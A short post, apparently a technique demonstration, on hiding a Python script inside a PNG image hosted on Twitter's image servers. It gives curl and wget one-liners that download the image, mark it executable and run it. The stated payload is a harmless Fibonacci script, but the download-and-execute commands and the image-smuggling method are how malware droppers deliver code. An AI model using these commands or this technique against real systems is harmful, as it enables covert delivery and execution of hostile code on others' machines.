
Twitter – Using curl & wget to Download & Execute Image

Twitter – Using curl & wget to Download & Execute Image

Using curl (Windows) & wget (Linux) to download and execute PNG image from hosting site Twitter.

PNG Image is embedded with a Python script file. Once curl & wget download the image, it is executed so that the script embedded within the image runs and extracts the Python script (Fibonacci sequence), which is then executed by the operating system.

Links for Twitter Fibonacci (python .py) image

curl -o img1.cmd “https://pbs.twimg.com/media/Fz5EBs0WABsDdWC?format=png”;.img1.cmd

wget “https://pbs.twimg.com/media/Fz5EBs0WABsDdWC?format=png”;mv “Fz5EBs0WABsDdWC?format=png” img1.png;chmod +x img1.png;./img1.png

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